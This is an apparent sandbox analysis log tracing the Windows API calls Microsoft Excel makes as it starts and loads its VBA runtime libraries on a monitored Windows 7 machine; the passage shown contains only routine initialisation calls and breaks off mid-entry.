# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 08.04.2020 20:44:38.170 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\excel.exe" page_root = "0x24d7c000" os_pid = "0xad4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x458" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x7c8 Thread: id = 2 os_tid = 0x324 Thread: id = 3 os_tid = 0x5b4 Thread: id = 4 os_tid = 0x6d0 Thread: id = 5 os_tid = 0x504 Thread: id = 6 os_tid = 0x2e8 Thread: id = 7 os_tid = 0x6e0 Thread: id = 8 os_tid = 0x248 Thread: id = 9 os_tid = 0x694 Thread: id = 10 os_tid = 0x68c Thread: id = 11 os_tid = 0xbfc Thread: id = 12 os_tid = 0xac8 Thread: id = 13 os_tid = 0xaa0 Thread: id = 14 os_tid = 0x6f8 Thread: id = 15 os_tid = 0x5d0 Thread: id = 16 os_tid = 0x22c Thread: id = 17 os_tid = 0x7b8 Thread: id = 18 os_tid = 0x84c Thread: id = 19 os_tid = 0x85c Thread: id = 20 os_tid = 0xbc8 Thread: id = 21 os_tid = 0xbcc Thread: id = 22 os_tid = 0x89c Thread: id = 23 os_tid = 0x87c Thread: id = 24 os_tid = 0x97c Thread: id = 25 os_tid = 0x8cc Thread: id = 26 os_tid = 0x9d0 Thread: id = 27 os_tid = 0x9ac Thread: id = 28 os_tid = 0x98c Thread: id = 29 os_tid = 0x94c Thread: id = 30 os_tid = 0x91c Thread: id = 31 os_tid = 0x8ac Thread: id = 32 os_tid = 0x86c Thread: id = 33 os_tid = 0x83c Thread: id = 34 os_tid = 0xae0 Thread: id = 35 os_tid = 0x440 Thread: id = 36 os_tid = 0xae8 [0152.758] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf780 | out: lpSystemTimeAsFileTime=0x1cf780*(dwLowDateTime=0xd0ccb4a0, dwHighDateTime=0x1d60de6)) [0152.758] GetCurrentProcessId () returned 0xad4 [0152.758] GetCurrentThreadId () returned 0xae8 [0152.758] GetTickCount () returned 0x1159e62 [0152.758] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf788 | out: lpPerformanceCount=0x1cf788*=21840039362) returned 1 [0152.763] __dllonexit () returned 0xa800003ff35030b3 [0152.763] __dllonexit () returned 0x8800003ff35031d0 [0152.770] __dllonexit () returned 0xe800003ff35031c9 [0152.772] __dllonexit () returned 0x800003ff3503137 [0152.772] __dllonexit () returned 0x2800003ff35031cb [0152.773] __dllonexit () returned 0x2800003ff35031cc [0152.773] __dllonexit () returned 0x2800003ff35031cd [0152.773] __dllonexit () returned 0x2800003ff35031ce [0152.774] __dllonexit () returned 0x2800003ff35031cf [0152.774] __dllonexit () returned 0x2800003ff35031c0 [0152.775] __dllonexit () returned 0x2800003ff35031c1 [0152.775] __dllonexit () returned 0x2800003ff35031c2 [0152.776] __dllonexit () returned 0x2800003ff35031c3 [0152.776] __dllonexit () returned 0x2800003ff35031c4 [0152.777] __dllonexit () returned 0x2800003ff35031c5 [0152.777] __dllonexit () returned 0x2800003ff35031c6 [0152.778] __dllonexit () returned 0x2800003ff35031c7 [0152.778] __dllonexit () returned 0xa800003ff35031a6 [0152.780] __dllonexit () returned 0x2800003ff35030b5 [0152.780] __dllonexit () returned 0xa800003ff35030b6 [0152.780] __dllonexit () returned 0xa800003ff35030b7 [0152.781] __dllonexit () returned 0x2800003ff3503149 [0152.781] __dllonexit () returned 0xa800003ff350314a [0152.782] __dllonexit () returned 0x4800003ff350314b [0152.783] DisableThreadLibraryCalls (hLibModule=0x7fee4e20000) returned 1 [0152.783] GetVersion () returned 0x1db10106 [0152.783] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0152.783] GetUserDefaultLCID () returned 0x409 [0152.783] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0152.784] GetSystemMetrics (nIndex=5) returned 1 [0152.784] GetSystemMetrics (nIndex=6) returned 1 [0152.784] GetSystemMetrics (nIndex=11) returned 32 [0152.784] GetSystemMetrics (nIndex=12) returned 32 [0152.784] GetSystemMetrics (nIndex=34) returned 132 [0152.784] GetSystemMetrics (nIndex=35) returned 38 [0152.784] GetSystemMetrics (nIndex=0) returned 1440 [0152.784] GetSystemMetrics (nIndex=1) returned 900 [0152.784] GetSystemMetrics (nIndex=32) returned 4 [0152.784] GetSystemMetrics (nIndex=33) returned 4 [0152.784] GetSystemMetrics (nIndex=4) returned 22 [0152.784] GetSystemMetrics (nIndex=42) returned 0 [0152.784] GetStockObject (i=15) returned 0x188000b [0152.784] GetStockObject (i=7) returned 0x1b00017 [0152.784] GetStockObject (i=6) returned 0x1b00018 [0152.784] GetStockObject (i=8) returned 0x1b00016 [0152.784] GetStockObject (i=4) returned 0x1900011 [0152.784] GetStockObject (i=2) returned 0x1900012 [0152.784] GetStockObject (i=0) returned 0x1900010 [0152.784] GetStockObject (i=5) returned 0x1900015 [0152.784] GetStockObject (i=13) returned 0x18a002e [0152.784] GetDC (hWnd=0x0) returned 0x25010b63 [0152.784] GetDeviceCaps (hdc=0x25010b63, index=14) returned 1 [0152.784] GetDeviceCaps (hdc=0x25010b63, index=12) returned 32 [0152.784] GetDeviceCaps (hdc=0x25010b63, index=88) returned 96 [0152.784] GetDeviceCaps (hdc=0x25010b63, index=90) returned 96 [0152.784] GetDeviceCaps (hdc=0x25010b63, index=38) returned 32409 [0152.784] ReleaseDC (hWnd=0x0, hDC=0x25010b63) returned 1 [0152.784] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x7fee51fba60 | out: ppMalloc=0x7fee51fba60*=0x7fefecb5380) returned 0x0 [0153.020] malloc (_Size=0x140) returned 0x48a23f0 [0153.021] GetModuleHandleA (lpModuleName=0x0) returned 0x13f7d0000 [0153.023] QueryActCtxW (in: dwFlags=0x80000010, hActCtx=0x7fee51fa048, pvSubInstance=0x0, ulInfoClass=0x1, pvBuffer=0x1d0820, cbBuffer=0x10, pcbWrittenOrRequired=0x0 | out: pvBuffer=0x1d0820, pcbWrittenOrRequired=0x0) returned 1 [0153.023] ActivateActCtx (in: hActCtx=0x9b2e5d8, lpCookie=0x1d0810 | out: hActCtx=0x9b2e5d8, lpCookie=0x1d0810) returned 1 [0153.023] FindActCtxSectionStringW (in: dwFlags=0x0, lpExtensionGuid=0x0, ulSectionId=0x2, lpStringToFind="Comctl32.dll", ReturnedData=0x1d0830 | out: ReturnedData=0x1d0830) returned 1 [0153.023] LoadLibraryW (lpLibFileName="Comctl32.dll") returned 0x7fefc420000 [0153.025] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000c93) returned 1 [0153.025] RegisterClassA (lpWndClass=0x1d0b60) returned 0x46b500ecc1dd [0153.026] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000c94) returned 1 [0153.028] wcscpy_s (in: _Destination=0x958b7f0, _SizeInWords=0x7, _Source="Common" | out: _Destination="Common") returned 0x0 [0153.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Microsoft Excel Files (*.xlsm;*.xlam;*.xls;*.xla)", cchWideChar=77, lpMultiByteStr=0x48a2540, cbMultiByte=154, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Excel Files (*.xlsm;*.xlam;*.xls;*.xla)", lpUsedDefaultChar=0x0) returned 77 [0153.036] GetModuleHandleExA (in: dwFlags=0x0, lpModuleName="MSI.DLL", phModule=0x7fee5201418 | out: phModule=0x7fee5201418*=0x7fef9d70000) returned 1 [0153.038] GetProcAddress (hModule=0x7fef9d70000, lpProcName="MsiProvideQualifiedComponentA") returned 0x7fef9df3b3c [0153.039] GetProcAddress (hModule=0x7fef9d70000, lpProcName="MsiGetProductCodeA") returned 0x7fef9dea13c [0153.040] GetProcAddress (hModule=0x7fef9d70000, lpProcName="MsiReinstallFeatureA") returned 0x7fef9df1618 [0153.040] GetProcAddress (hModule=0x7fef9d70000, lpProcName="MsiProvideComponentA") returned 0x7fef9def088 [0153.056] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0153.056] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0153.056] lstrcpyW (in: lpString1=0x1d08e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" [0153.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", cchWideChar=-1, lpMultiByteStr=0x1d07d0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", lpUsedDefaultChar=0x0) returned 68 [0153.057] GetModuleHandleA (lpModuleName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x0 [0153.062] LoadLibraryExA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", hFile=0x0, dwFlags=0x8) returned 0x7fee4b80000 [0154.944] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000c95) returned 1 [0154.944] GetLastError () returned 0x0 [0154.945] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoVBADigSigCallDlg") returned 0x7fee4c872c0 [0154.945] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoVbaInitSecurity") returned 0x7fee4bf60b0 [0154.946] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFIEPolicyAndVersion") returned 0x7fee4ba1a60 [0154.947] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFAnsiCodePageSupportsLCID") returned 0x7fee4bf5f50 [0154.948] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFInitOffice") returned 0x7fee4b9f000 [0154.948] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoUninitOffice") returned 0x7fee4b8e860 [0154.949] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFGetFontSettings") returned 0x7fee4b83fc0 [0154.950] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoRgchToRgwch") returned 0x7fee4b92380 [0154.951] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoHrSimpleQueryInterface") returned 0x7fee4b87b80 [0154.951] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoHrSimpleQueryInterface2") returned 0x7fee4b87b20 [0154.952] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFCreateControl") returned 0x7fee4b88730 [0154.953] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFLongLoad") returned 0x7fee4cc3260 [0154.954] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFLongSave") returned 0x7fee4cc3280 [0154.954] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFGetTooltips") returned 0x7fee4b91f40 [0154.955] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFSetTooltips") returned 0x7fee4bf6370 [0154.956] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFLoadToolbarSet") returned 0x7fee4be4590 [0154.956] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFCreateToolbarSet") returned 0x7fee4b855b0 [0154.957] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoHpalOffice") returned 0x7fee4b90240 [0154.958] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFWndProcNeeded") returned 0x7fee4b83d10 [0154.958] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFWndProc") returned 0x7fee4b86d30 [0154.959] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFCreateITFCHwnd") returned 0x7fee4b83d40 [0154.960] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoDestroyITFC") returned 0x7fee4b8e6f0 [0154.961] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFPitbsFromHwndAndMsg") returned 0x7fee4b8df40 [0154.961] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFGetComponentManager") returned 0x7fee4b87bf0 [0154.962] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoMultiByteToWideChar") returned 0x7fee4b8fcd0 [0154.963] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoWideCharToMultiByte") returned 0x7fee4b88b20 [0154.964] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoHrRegisterAll") returned 0x7fee4c82ef0 [0154.964] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFSetComponentManager") returned 0x7fee4b942c0 [0154.965] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFCreateStdComponentManager") returned 0x7fee4b83e20 [0154.966] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFHandledMessageNeeded") returned 0x7fee4b8ab10 [0154.969] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoPeekMessage") returned 0x7fee4b8a7d0 [0154.969] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFCreateIPref") returned 0x7fee4b81550 [0154.970] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoDestroyIPref") returned 0x7fee4b8e830 [0154.971] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoChsFromLid") returned 0x7fee4b813d0 [0154.972] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoCpgFromChs") returned 0x7fee4b86660 [0154.972] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoSetLocale") returned 0x7fee4b81500 [0154.973] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoFSetHMsoinstOfSdm") returned 0x7fee4b83dd0 [0154.974] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoSetVbaInterfaces") returned 0x7fee4c871e0 [0154.974] GetProcAddress (hModule=0x7fee4b80000, lpProcName="MsoGetControlInstanceId") returned 0x7fee4c56d10 [0154.975] GetProcAddress (hModule=0x7fee4b80000, lpProcName="VbeuiFIsEdpEnabled") returned 0x7fee4cc98e0 [0154.976] GetProcAddress (hModule=0x7fee4b80000, lpProcName="VbeuiEnterpriseProtect") returned 0x7fee4cc9830 [0154.979] malloc (_Size=0x48) returned 0x48a25f0 [0154.980] GetEnvironmentVariableA (in: lpName="DDRYBUR", lpBuffer=0x1d08c0, nSize=0x118 | out: lpBuffer="¯\x01") returned 0x0 [0154.980] SetErrorMode (uMode=0x8001) returned 0x8001 [0154.980] GetModuleFileNameA (in: hModule=0x7fee4e20000, lpFilename=0x1d05d0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0154.980] lstrcpyA (in: lpString1=0x1d04c0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0154.980] lstrcpyA (in: lpString1=0x1d04c0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0154.980] lstrcpyA (in: lpString1=0x1d04c0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0154.980] lstrcpyA (in: lpString1=0x1d04c0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0154.980] lstrcpyA (in: lpString1=0x1d04c0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0154.980] lstrcpyA (in: lpString1=0x1d04c0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0154.980] strcpy_s (in: _Dst=0x1d06e0, _DstSize=0x200, _Src="VBE7INTL.DLL" | out: _Dst="VBE7INTL.DLL") returned 0x0 [0154.980] _ultoa_s (in: _Val=0x409, _DstBuf=0x1d0240, _Size=0x6, _Radix=10 | out: _DstBuf="1033") returned 0x0 [0154.980] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\", _SizeInBytes=0x104, _Source="1033" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033") returned 0x0 [0154.980] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033", _SizeInBytes=0x104, _Source="\\" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\") returned 0x0 [0154.982] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\", _SizeInBytes=0x104, _Source="VBE7INTL.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0154.982] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 75 [0154.982] CharToOemBuffA (in: lpszSrc="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", lpszDst=0x1d00f0, cchDstLength=0x4c | out: lpszDst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 1 [0154.982] _access_s (_FileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", _AccessMode=0) returned 0x0 [0154.984] strcpy_s (in: _Dst=0x1d0370, _DstSize=0x104, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0154.984] LoadLibraryA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x7fef2150000 [0154.992] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000c96) returned 1 [0154.992] GetSystemDefaultLCID () returned 0x409 [0154.992] GetUserDefaultLCID () returned 0x409 [0154.992] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x1d0a00, cchData=2 | out: lpLCData=".") returned 2 [0154.992] GetStockObject (i=13) returned 0x18a002e [0154.992] GetObjectA (in: h=0x18a002e, c=60, pv=0x1d09a0 | out: pv=0x1d09a0) returned 60 [0154.992] lstrcpyA (in: lpString1=0x7fee5201b70, lpString2="Vbui6.chm" | out: lpString1="Vbui6.chm") returned="Vbui6.chm" [0154.992] lstrcpyA (in: lpString1=0x7fee5200b40, lpString2="VbLR6.chm" | out: lpString1="VbLR6.chm") returned="VbLR6.chm" [0154.994] GetModuleFileNameA (in: hModule=0x7fee4e20000, lpFilename=0x1d0a40, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0154.995] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 66 [0154.995] lstrcpyA (in: lpString1=0xc50c4e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" [0154.995] GetCurrentDirectoryA (in: nBufferLength=0x104, lpBuffer=0x1d08d0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0154.995] GetVersionExA (in: lpVersionInformation=0x1d0930*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x1, dwBuildNumber=0x0, dwPlatformId=0x43, szCSDVersion="") | out: lpVersionInformation=0x1d0930*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0154.995] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="Licenses", phkResult=0x1d0858 | out: phkResult=0x1d0858*=0xf7a) returned 0x0 [0154.996] strcpy_s (in: _Dst=0x1d0860, _DstSize=0x80, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0154.996] strcpy_s (in: _Dst=0x1d08e0, _DstSize=0xc8, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0154.996] _strrev (in: _Str="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Str="7E25578F0000-E3CB-1d11-377B-B8554088") returned="7E25578F0000-E3CB-1d11-377B-B8554088" [0154.996] RegQueryValueA (in: hKey=0xf7a, lpSubKey="8804558B-B773-11d1-BC3E-0000F87552E7", lpData=0x1d08e0, lpcbData=0x1d0850 | out: lpData="\x0f}\x02\x01", lpcbData=0x1d0850) returned 0x2 [0154.998] RegCloseKey (hKey=0xf7a) returned 0x0 [0154.999] OleInitialize (pvReserved=0x0) returned 0x1 [0154.999] OaBuildVersion () returned 0x321396 [0154.999] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x7fefdea0000 [0155.000] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000c97) returned 1 [0155.000] GetLastError () returned 0x0 [0155.001] GetProcAddress (hModule=0x7fefdea0000, lpProcName="SysFreeString") returned 0x7fefdea1320 [0155.001] GetProcAddress (hModule=0x7fefdea0000, lpProcName="LoadTypeLib") returned 0x7fefdeaf1e0 [0155.002] GetProcAddress (hModule=0x7fefdea0000, lpProcName="RegisterTypeLib") returned 0x7fefdefcaa0 [0155.003] GetProcAddress (hModule=0x7fefdea0000, lpProcName="QueryPathOfRegTypeLib") returned 0x7fefdf31760 [0155.004] GetProcAddress (hModule=0x7fefdea0000, lpProcName="UnRegisterTypeLib") returned 0x7fefdf320d0 [0155.004] GetProcAddress (hModule=0x7fefdea0000, lpProcName="OleTranslateColor") returned 0x7fefdecc760 [0155.005] GetProcAddress (hModule=0x7fefdea0000, lpProcName="OleCreateFontIndirect") returned 0x7fefdefecd0 [0155.006] GetProcAddress (hModule=0x7fefdea0000, lpProcName="OleCreatePictureIndirect") returned 0x7fefdefe840 [0155.007] GetProcAddress (hModule=0x7fefdea0000, lpProcName="OleLoadPicture") returned 0x7fefdf0f420 [0155.007] GetProcAddress (hModule=0x7fefdea0000, lpProcName="OleCreatePropertyFrameIndirect") returned 0x7fefdf04ec0 [0155.008] GetProcAddress (hModule=0x7fefdea0000, lpProcName="OleCreatePropertyFrame") returned 0x7fefdf09350 [0155.009] GetProcAddress (hModule=0x7fefdea0000, lpProcName="OleIconToCursor") returned 0x7fefded6e40 [0155.010] GetProcAddress (hModule=0x7fefdea0000, lpProcName="LoadTypeLibEx") returned 0x7fefdeaa550 [0155.010] GetProcAddress (hModule=0x7fefdea0000, lpProcName="OleLoadPictureEx") returned 0x7fefdf0f320 [0155.011] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0155.011] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0155.011] GetClassInfoA (in: hInstance=0x7fee4e20000, lpClassName="VBBubble", lpWndClass=0x1d0990 | out: lpWndClass=0x1d0990) returned 0 [0155.011] RegisterClassA (lpWndClass=0x1d0990) returned 0xadb10e0ec1ea [0155.011] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000c98) returned 1 [0155.011] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Count") returned 0x107630 [0155.011] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_Default") returned 0x10c26a [0155.011] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Item") returned 0x107ad7 [0155.011] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Add") returned 0x1072f7 [0155.012] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Remove") returned 0x10b1cf [0155.012] GlobalAddAtomA (lpString="VBDisabled") returned 0xadb20e0ec13d [0155.012] malloc (_Size=0x90) returned 0xc50c5e0 [0155.012] RegisterClassExA (param_1=0x1d0ab0) returned 0xadb50df2c1eb [0155.012] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000c99) returned 1 [0155.014] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderMain", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7fee4e20000, lpParam=0x0) returned 0x20228 [0155.018] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000c9a) returned 1 [0155.018] GetVersionExA (in: lpVersionInformation=0x1d08a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1d08a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0155.019] GetModuleHandleA (lpModuleName="USER32") returned 0x777b0000 [0155.020] GetProcAddress (hModule=0x777b0000, lpProcName="GetSystemMetrics") returned 0x777c94f0 [0155.021] GetProcAddress (hModule=0x777b0000, lpProcName="MonitorFromWindow") returned 0x777c5f08 [0155.022] GetProcAddress (hModule=0x777b0000, lpProcName="MonitorFromRect") returned 0x777c2b00 [0155.022] GetProcAddress (hModule=0x777b0000, lpProcName="MonitorFromPoint") returned 0x777bab64 [0155.023] GetProcAddress (hModule=0x777b0000, lpProcName="EnumDisplayMonitors") returned 0x777c5c30 [0155.024] GetProcAddress (hModule=0x777b0000, lpProcName="GetMonitorInfoA") returned 0x777ba730 [0155.024] GetProcAddress (hModule=0x777b0000, lpProcName="EnumDisplayDevicesA") returned 0x777ba5b4 [0155.024] MonitorFromWindow (hwnd=0x20228, dwFlags=0x2) returned 0x10001 [0155.025] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x1d0ab0 | out: lpmi=0x1d0ab0) returned 1 [0155.025] SetWindowPos (hWnd=0x20228, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0155.025] GetVersion () returned 0x1db10106 [0155.026] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x7fefdea0000 [0155.027] GetProcAddress (hModule=0x7fefdea0000, lpProcName="DispCallFunc") returned 0x7fefdea2270 [0155.028] GetProcAddress (hModule=0x7fefdea0000, lpProcName="LoadTypeLibEx") returned 0x7fefdeaa550 [0155.028] GetProcAddress (hModule=0x7fefdea0000, lpProcName="UnRegisterTypeLib") returned 0x7fefdf320d0 [0155.029] GetProcAddress (hModule=0x7fefdea0000, lpProcName="CreateTypeLib2") returned 0x7fefdf2dbd0 [0155.030] GetProcAddress 